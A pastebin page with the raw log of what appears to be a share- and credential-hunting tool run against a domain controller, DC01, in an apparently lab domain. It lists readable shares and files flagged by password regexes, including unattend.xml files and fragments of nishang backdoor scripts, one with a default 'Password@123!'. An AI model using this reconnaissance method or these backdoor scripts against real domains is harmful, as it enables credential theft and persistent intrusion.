メインコンテンツへスキップ
paste
bin
.ca
type · paste · share
⌘
K
ファミリー
bin ファミリー
pastebin.ca
ハブ
Share text and code with expiry and privacy controls.
imagebin.ca
Upload and share images with direct links.
filebin.ca
Drop a file and get a shareable link.
notebin.ca
Write Markdown notes with durable links.
turl.ca
Short, reputation-checked links.
attn.ca
Notifications and alerts for your services.
voicebin.ca
Record and share short voice clips.
dnsbin.ca
Inspect DNS and debug records.
ドキュメント
サインイン
?
← ペーストに戻る
›
編集 / フォーク
無題のペースト
#2sHS4ZuLJ7
public / public
新しいバージョン
匿名
作成日 3 days ago
失効まで 4 days
195.8 KB
構文:
text
変更により、このペーストにリンクされた新しいペーストが作成されます — 元のペーストは変更されません。
新しいバージョン
変更により、このペーストにリンクされた新しいペーストが作成されます — 元のペーストは変更されません。
タイトル(任意)
ファイル名
構文
text
text
bash
c
cpp
css
diff
dockerfile
go
html
ini
java
javascript
json
kotlin
lua
makefile
markdown
nginx
php
python
ruby
rust
shellscript
sql
swift
toml
typescript
xml
yaml
可視性
パブリックフィード
アクセス
public
失効
7日
10分
1時間
1日
7日
30日
90日
カスタム…
カスタム失効
変更メモ
(任意)
このペーストはパブリックフィードに表示されます。リンクを知っている人だけに見せたい場合は可視性を変更してください。
新しいバージョンを作成
キャンセル
貼り付けるか入力…
[INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:25Z [Info] Parsing args... [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:25Z [Info] Parsed args successfully. [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:25Z [Info] Getting interesting users from AD. [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:25Z [Error] Something went wrong adding domain users to rules. [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:25Z [Info] Invoking DFS Discovery because no ComputerTargets or PathTargets were specified [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:25Z [Info] Getting DFS paths from AD. [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:25Z [Info] Found 0 DFS Shares in 0 namespaces. [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:25Z [Info] Invoking full domain computer discovery. [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:25Z [Info] Getting computers from AD. [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:25Z [Info] Got 1 computers from AD. [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:25Z [Info] Starting to look for readable shares... [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:25Z [Info] Created all sharefinder tasks. [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:25Z [Share] {Black}<\\DC01.inlanefreight.local\ADMIN$>() [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:25Z [Share] {Green}<\\DC01.inlanefreight.local\ADMIN$>(R) Remote Admin [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:25Z [Share] {Black}<\\DC01.inlanefreight.local\C$>() [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:25Z [Share] {Green}<\\DC01.inlanefreight.local\C$>(R) Default share [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:25Z [Share] {Green}<\\DC01.inlanefreight.local\Company>(R) [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:25Z [Share] {Green}<\\DC01.inlanefreight.local\HR>(R) [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:25Z [Share] {Green}<\\DC01.inlanefreight.local\IT>(R) [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:25Z [Share] {Green}<\\DC01.inlanefreight.local\NETLOGON>(R) Logon server share [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:25Z [Share] {Green}<\\DC01.inlanefreight.local\SYSVOL>(R) Logon server share [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:43Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d?>\s*[^\s<]+\s*<|2.3kB|2025-05-01 05:22:48Z>(\\DC01.inlanefreight.local\ADMIN$\Panther\unattend.xml) 5"\ language="neutral"\ versionScope="nonSxS"\ xmlns:wcm="http://schemas\.microsoft\.com/WMIConfig/2002/State"\ xmlns:xsi="http://www\.w3\.org/2001/XMLSchema-instance">\n\t\t\ \ <UserAccounts>\n\t\t\ \ \ \ <AdministratorPassword>\*SENSITIVE\*DATA\*DELETED\*</AdministratorPassword>\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ </UserAccounts>\n\ \ \ \ \ \ \ \ \ \ \ \ <OOBE>\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ <HideEULAPage>true</HideEULAPage>\n\ \ \ \ \ \ \ \ \ \ \ \ </OOBE>\n\ \ \ \ \ \ \ \ </component [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:44Z [File] {Yellow}<KeepDeployImageByExtension|R|^\.wim$|29.2MB|2022-02-25 16:36:53Z>(\\DC01.inlanefreight.local\ADMIN$\Containers\serviced\WindowsDefenderApplicationGuard.wim) .wim [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:46Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d?>\s*[^\s<]+\s*<|3kB|2026-08-12 15:43:44Z>(\\DC01.inlanefreight.local\C$\Users\Public\output.txt) l"\\\ versionScope="nonSxS"\\\ xmlns:wcm="http://schemas\\\.microsoft\\\.com/WMIConfig/2002/State"\\\ xmlns:xsi="http://www\\\.w3\\\.org/2001/XMLSchema-instance">\\n\\t\\t\\\ \\\ <UserAccounts>\\n\\t\\t\\\ \\\ \\\ \\\ <AdministratorPassword>\\\*SENSITIVE\\\*DATA\\\*DELETED\\\*</AdministratorPassword>\\n\\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ </UserAccounts>\\n\\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ <OOBE>\\n\\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ \\\ <HideEULAPage>true</ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:56Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d?>\s*[^\s<]+\s*<|2.3kB|2025-05-01 05:22:48Z>(\\DC01.inlanefreight.local\C$\Windows\Panther\unattend.xml) 5"\ language="neutral"\ versionScope="nonSxS"\ xmlns:wcm="http://schemas\.microsoft\.com/WMIConfig/2002/State"\ xmlns:xsi="http://www\.w3\.org/2001/XMLSchema-instance">\n\t\t\ \ <UserAccounts>\n\t\t\ \ \ \ <AdministratorPassword>\*SENSITIVE\*DATA\*DELETED\*</AdministratorPassword>\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ </UserAccounts>\n\ \ \ \ \ \ \ \ \ \ \ \ <OOBE>\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ <HideEULAPage>true</HideEULAPage>\n\ \ \ \ \ \ \ \ \ \ \ \ </OOBE>\n\ \ \ \ \ \ \ \ </component [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:56Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|86.1kB|2025-05-01 16:09:01Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\CHANGELOG.txt) flash\ on\ screen\ when\ invoking\ a\ PowerShell\ script\ using\ Execute-ProcessAsUser\ \(\#735\)\n-\ Added\ the\ appropriate\ exit\ code\ 1638\ for\ MSIs\ that\ are\ already\ installed\ when\ using\ the\ Execute-MSI\ function\ with\ -PassThru\ \(\#736\)\n-\ Added\ creation\ of\ the\ \$dirAppDeployTemp\ directory\ by\ default\ so\ the\ variable\ can\ be\ used\ for\ general\ actions\ \(\#708\)\n\n\*\*Version\ 3\.9\.0\ \[10/01/2023]\*\*\n-\ AddedRefreshed\ UI\ components\ w [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:56Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|13.5kB|2018-09-15 07:12:54Z>(\\DC01.inlanefreight.local\ADMIN$\diagnostics\scheduled\Maintenance\CL_Utility.ps1) \ \ \ \ \ \ \{\r\n\ \ \ \ \ \ \ \ \ \ \ \ return\ Environment\.GetFolderPath\(Environment\.SpecialFolder\.DesktopDirectory\);\r\n\ \ \ \ \ \ \ \ }\r\n\ \ \ \ }\r\n"@\r\n\r\n\ \ \ \ \$type\ =\ Add-Type\ -MemberDefinition\ \$methodDefinition\ -Name\ "DesktopPath"\ -PassThru\r\n\r\n\ \ \ \ return\ \$type::GetDesktopPath\r\n}\r\n\r\n\#\ Function\ to\ get\ startup\ path\r\nfunction\ Get-StartupPath\(\)\r\n\{\r\n\$methodDefinition\ =\ @"\r\n\ \ \ \ public\ static\ string\ GetStartupPath\r\n\ \ \ \ \{\r\n\ \ \ \ \ \ \ \ get\r [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:57Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|11.4kB|2018-09-15 07:12:54Z>(\\DC01.inlanefreight.local\ADMIN$\diagnostics\system\Audio\MF_AudioDiagnostic.ps1) e\ static\ extern\ int\ GetSystemMetrics\(int\ Index\);\r\n\r\n\t\tpublic\ static\ bool\ Remote\(\)\ \{\r\n\t\t\treturn\ \(0\ !=\ GetSystemMetrics\(SM_REMOTESESSION\)\);\r\n\t\t}\r\n\t}\r\n}\r\n"@\r\n\t\$type\ =\ Add-Type\ -TypeDefinition\ \$sourceCode\ -PassThru\r\n\r\n\treturn\ \$type::Remote\(\)\r\n}\r\n\r\nfunction\ ispostbackOnWin\(\$packName\)\r\n\{\r\n<\#\r\n\tDESCRIPTION\r\n\t\ \ ispostbackOnWin\ check\ whether\ package\ is\ postback\.\r\n\r\n\tARGUMENTS:\r\n\t\ \ packName\ :\ String\ value\ c [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:57Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|218.7kB|2018-09-15 07:12:54Z>(\\DC01.inlanefreight.local\ADMIN$\diagnostics\system\Audio\CL_Utility.ps1) ce\ =\ \(Get-WmiObject\ -query\ "select\ \*\ from\ win32_baseService\ where\ Name='Audiosrv'"\)\r\n\tif\(\$audioService\.State\ -ne\ "Running"\)\r\n\t\{\r\n\t\tSet-Service\ Audiosrv\ -StartupType\ Automatic\r\n\t\tStart-Service\ Audiosrv\ -PassThru\ -ErrorAction\ SilentlyContinue\r\n\t}\r\n}\r\n\r\nFunction\ Stop-AudioService\(\)\r\n\{\r\n\t<\#\r\n\ \ \ \ \ \ \ \ \.DESCRIPTION\r\n\ \ \ \ \ \ \ \ \ \ \ Function\ to\ stop\ Audio\ service\ forcefully\ \r\n\ \ \ \ \ \ \ \ \.PARAMETER\ \r\n\t\t\tNone\r\n\ \ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:57Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|6.6kB|2018-09-15 07:12:54Z>(\\DC01.inlanefreight.local\ADMIN$\diagnostics\system\Audio\RS_NotDefault.ps1) ero\)\)\r\n\ \ \ \ \ \ \ \ \ \ \ \ \{\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ return\ false;\r\n\ \ \ \ \ \ \ \ \ \ \ \ }\r\n\ \ \ \ \ \ \ \ \ \ \ \ return\ true;\r\n\ \ \ \ \ \ \ \ }\r\n\ \ \ \ }\r\n"@\ \r\n\r\n\ \ \ \ \$ProcessHandle\ =\ \(Get-Process\ -id\ \$pid\)\.Handle\r\n\t\$type\ =\ Add-Type\ \$definition\ -PassThru\r\n\ttry\r\n\t\{\r\n\t\t\#\ Enable\ SeTakeOwnershipPrivilege\r\n\t\t\$type\[0]::EnablePrivilege\(\$processHandle,\ 'SeTakeOwnershipPrivilege'\)\r\n\r\n\t\t\$key\ =\ \[Microsoft\.Win32\.Registry]::LocalMachine\.OpenSubKey\(\$regP [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:58Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|49.1kB|2018-09-15 07:12:54Z>(\\DC01.inlanefreight.local\ADMIN$\diagnostics\system\PCW\RS_ProgramCompatibilityWizard.ps1) ript\ will\ replace\ this\ keyword\ with\ build\.arch\.\r\n\ \ \ \ return\ \("amd64"\ -eq\ "arm64"\);\r\n}\r\n\r\n\#\ This\ block\ of\ code\ sets\ up\ the\ manual\ troubleshooting\ portion\.\r\n\#\r\n\r\nAdd-Type\ -TypeDefinition\ \$typeDefinition\ -PassThru\ -IgnoreWarnings\r\n\r\n\$targetPath\ =\ \[WerUtil]::EscapePath\(\$targetPath\)\r\n\r\nif\(\$targetPath\ -eq\ \$null\)\r\n\{\r\n\ \ \ \ throw\ \$CompatibilityStrings\.Throw_INVALID_PATH\r\n}\r\n\r\n\#\ Initialize\r\n\r\nset-variable\ ve [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:58Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|16.5kB|2018-09-15 07:12:54Z>(\\DC01.inlanefreight.local\ADMIN$\diagnostics\system\PCW\TS_ProgramCompatibilityWizard.ps1) \ \ \ \ \ \ \ return\ String\.Empty;\r\n\ \ \ \ }\r\n\r\n\ \ \ \ public\ static\ String\ EscapePath\(String\ Path\)\r\n\ \ \ \ \{\r\n\ \ \ \ \ \ \ \ return\ Path\.Replace\("\$",\ "`\$"\);\r\n\ \ \ \ }\r\n}\r\n"@\r\n\r\n\$type\ =\ Add-Type\ -TypeDefinition\ \$typeDefinition\ -PassThru\ -IgnoreWarnings\r\n\$type3\ =\ Add-Type\ -TypeDefinition\ \$typeDefinition3\ -PassThru\ \ -IgnoreWarnings\r\n\r\n\#\ Function\ to\ convert\ to\ WQL\ path\r\nfunction\ ConvertTo-WQLPath\(\[string]\$wqlPath\ =\ \$\(throw\ "N [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:58Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|28.9kB|2018-09-15 07:12:55Z>(\\DC01.inlanefreight.local\ADMIN$\diagnostics\system\Printer\CL_Utility.ps1) PWStr\)]\r\n\ \ \ \ \ \ \ \ public\ string\ pConfigFile;\r\n\ \ \ \ }\r\n"@\r\n\r\n\ \ \ \ \$winSpoolType\ =\ Add-Type\ -MemberDefinition\ \$winSpoolDefinition\ -Name\ "winSpoolCL"\ -UsingNamespace\ "System\.Reflection","System\.Diagnostics"\ -PassThru\r\n\ \ \ \ return\ \$winSpoolType\r\n}\r\n\r\n\#\r\n\#\ Get\ the\ printer\ status\r\n\#\r\nfunction\ GetPrinterStatus\(\[string]\$printerName\)\r\n\{\r\n\ \ \ \ \#\r\n\ \ \ \ \#\ the\ function\ return\ value\r\n\ \ \ \ \#\r\n\ \ \ \ \[int]\$printStatus\ =\ 0\r [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:58Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|20.1kB|2018-09-15 07:12:40Z>(\\DC01.inlanefreight.local\ADMIN$\diagnostics\system\Search\CL_Utility.ps1) \r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ throw\ new\ System\.ComponentModel\.Win32Exception\(error\);\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\r\n\ \ \ \ \ \ \ \ \ \ \ \ }\r\n\ \ \ \ \ \ \ \ }\r\n\ \ \ \ }\r\n"@\r\n\r\n\ \ \ \ \(Add-Type\ -TypeDefinition\ \$typeDefinition\ -PassThru\)\[0]::SetRestorePrivilege\(\)\r\n}\r\n\r\n\[uint32]\$GENERIC_ALL\ =\ 0x10000000L\r\n\[uint32]\$GENERIC_READ\ =\ 0x80000000L\r\n\[uint32]\$GENERIC_WRITE\ =\ 0x40000000L\r\n\[uint32]\$GENERIC_EXECUTE\ =\ 0x20000000L\r\n\r\n\#\ F [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:58Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|2kB|2018-09-15 07:12:55Z>(\\DC01.inlanefreight.local\ADMIN$\diagnostics\system\Printer\RS_SpoolerCrashing.ps1) \(UnmanagedType\.Bool\)]\ bool\ bMachine\);\r\n"@\r\n\r\n\$RefreshPolicyType\ =\ Add-Type\ -MemberDefinition\ \$RefreshPolicyDefinition\ -Name\ "RefreshPolicyType"\ -UsingNamespace\ "System\.Reflection","System\.Diagnostics"\ -PassThru\r\n\r\n\[bool]\$return\ =\ \$RefreshPolicyType::RefreshPolicy\(\$true\)\r\n\[int]\$errorCode\ =\ \[System\.Runtime\.InteropServices\.Marshal]::GetLastWin32Error\(\)\r\nif\(-not\ \$return\)\r\n\{\r\n\ \ \ \ WriteFileAPIExceptionR [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:58Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|94.6kB|2018-09-15 07:12:54Z>(\\DC01.inlanefreight.local\ADMIN$\diagnostics\system\speech\CL_Utilities.ps1) c\ extern\ int\ GetSystemMetrics\(int\ Index\);\r\n\r\n\t\t\tpublic\ static\ bool\ IsRemote\(\)\ \{\r\n\t\t\t\treturn\ \(0\ !=\ GetSystemMetrics\(SM_REMOTESESSION\)\);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n"@\r\n\t\$type\ =\ Add-Type\ -TypeDefinition\ \$sourceCode\ -PassThru\r\n\r\n\treturn\ \$type::IsRemote\(\)\r\n}\r\n\r\nfunction\ Get-AudioCapturingDevices\r\n\{\r\n\t<\#\r\n\t\tDESCRIPTION:\r\n\t\tLists\ all\ the\ recording\ devices\ available\ on\ the\ localhost\ with\ their\ details\.\r\n\r\n\t\tARGUMENT [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:43:59Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|86.1kB|2025-05-01 16:09:01Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\CHANGELOG.txt) flash\ on\ screen\ when\ invoking\ a\ PowerShell\ script\ using\ Execute-ProcessAsUser\ \(\#735\)\n-\ Added\ the\ appropriate\ exit\ code\ 1638\ for\ MSIs\ that\ are\ already\ installed\ when\ using\ the\ Execute-MSI\ function\ with\ -PassThru\ \(\#736\)\n-\ Added\ creation\ of\ the\ \$dirAppDeployTemp\ directory\ by\ default\ so\ the\ variable\ can\ be\ used\ for\ general\ actions\ \(\#708\)\n\n\*\*Version\ 3\.9\.0\ \[10/01/2023]\*\*\n-\ AddedRefreshed\ UI\ components\ w [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:01Z [File] {Yellow}<KeepDeployImageByExtension|R|^\.wim$|29.2MB|2022-02-25 16:36:53Z>(\\DC01.inlanefreight.local\C$\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim) .wim [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:01Z [File] {Red}<KeepPsCredentials|R|-SecureString|4.9kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Backdoors\Add-ConstrainedDelegationBackdoor.ps1) \ new\ user\ \$SamAccountName"\n\ \ \ \ \ \ \ \ New-ADUser\ -Name\ \$Name\ -SamAccountName\ \$SamAccountName\ -UserPrincipalName\ \$UserPrincipalName\ -ServicePrincipalNames\ \$ServicePrincipalName\ -AccountPassword\ \(convertto-securestring\ "\$Password"\ -asplaintext\ -force\)\ \ -PasswordNeverExpires\ \$True\ \ -PassThru\ \|\ Enable-ADAccount\n\ \ \ \ \ \ \ \ \$user\ =\ Get-ADUser\ \$SamAccountName\ -Properties\ "msDS-AllowedToDelegateTo"\n\ \ \ \ }\n\ \ \ \ Wr [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:01Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|4.9kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Backdoors\Add-ConstrainedDelegationBackdoor.ps1) mdletBinding\(\)]\ Param\(\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 0,\ Mandatory\ =\ \$True\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$SamAccountName,\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 1,\ Mandatory\ =\ \$False\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Password\ =\ "Password@123!",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 2,\ Mandatory\ =\ \$True\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Domain,\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 3,\ Mandatory\ =\ \$False\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Ser [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:01Z [File] {Red}<KeepPsCredentials|R|-SecureString|4.9kB|2025-05-01 16:08:27Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\ActiveDirectory\Add-ConstrainedDelegationBackdoor.ps1) \ new\ user\ \$SamAccountName"\n\ \ \ \ \ \ \ \ New-ADUser\ -Name\ \$Name\ -SamAccountName\ \$SamAccountName\ -UserPrincipalName\ \$UserPrincipalName\ -ServicePrincipalNames\ \$ServicePrincipalName\ -AccountPassword\ \(convertto-securestring\ "\$Password"\ -asplaintext\ -force\)\ \ -PasswordNeverExpires\ \$True\ \ -PassThru\ \|\ Enable-ADAccount\n\ \ \ \ \ \ \ \ \$user\ =\ Get-ADUser\ \$SamAccountName\ -Properties\ "msDS-AllowedToDelegateTo"\n\ \ \ \ }\n\ \ \ \ Wr [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:01Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|4.9kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Backdoors\Add-ConstrainedDelegationBackdoor.ps1) mdletBinding\(\)]\ Param\(\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 0,\ Mandatory\ =\ \$True\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$SamAccountName,\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 1,\ Mandatory\ =\ \$False\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Password\ =\ "Password@123!",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 2,\ Mandatory\ =\ \$True\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Domain,\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 3,\ Mandatory\ =\ \$False\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Ser [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:01Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|12.4kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Backdoors\Execute-OnTime.ps1) \ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$username\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 8,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$password\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 9,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$URL\ =\ "null",\n\ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 10,\ Mandatory\ =\ \$False, [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:01Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|4.9kB|2025-05-01 16:08:27Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\ActiveDirectory\Add-ConstrainedDelegationBackdoor.ps1) mdletBinding\(\)]\ Param\(\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 0,\ Mandatory\ =\ \$True\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$SamAccountName,\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 1,\ Mandatory\ =\ \$False\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Password\ =\ "Password@123!",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 2,\ Mandatory\ =\ \$True\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Domain,\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 3,\ Mandatory\ =\ \$False\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Ser [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:01Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|12.4kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Backdoors\Execute-OnTime.ps1) \ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$username\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 8,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$password\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 9,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$URL\ =\ "null",\n\ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 10,\ Mandatory\ =\ \$False, [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:01Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|18.2kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Backdoors\DNS_TXT_Pwnage.ps1) Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$username\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 12,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$password\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 13,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$URL\ =\ "null",\n\ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 14,\ Mandatory\ =\ \$False [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:01Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|13.3kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Backdoors\HTTP-Backdoor.ps1) \ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$username\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 8,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$password\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 9,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$URL\ =\ "null",\n\ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 10,\ Mandatory\ =\ \$False, [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:01Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|4.9kB|2025-05-01 16:08:27Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\ActiveDirectory\Add-ConstrainedDelegationBackdoor.ps1) mdletBinding\(\)]\ Param\(\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 0,\ Mandatory\ =\ \$True\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$SamAccountName,\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 1,\ Mandatory\ =\ \$False\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Password\ =\ "Password@123!",\n\n\ \ \ \ \ \ \ 